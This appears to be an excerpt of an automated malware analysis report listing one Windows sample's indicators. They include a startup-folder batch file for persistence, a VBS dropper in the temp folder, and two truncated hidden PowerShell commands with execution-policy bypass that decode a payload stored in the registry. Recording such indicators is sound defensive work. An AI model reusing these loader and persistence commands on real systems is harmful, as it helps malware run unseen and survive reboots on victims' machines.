Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\sys.bat
- %TEMP%\ee.vbs
- %TEMP%\sys.bat
- '<SYSTEM32>\wscript.exe' %TEMP%\ee.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('?%¨µ£','0');[byte[]]$_0 = [System.Co...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('?%¨µ£','0');[byte[]]$_0 = [System.Co...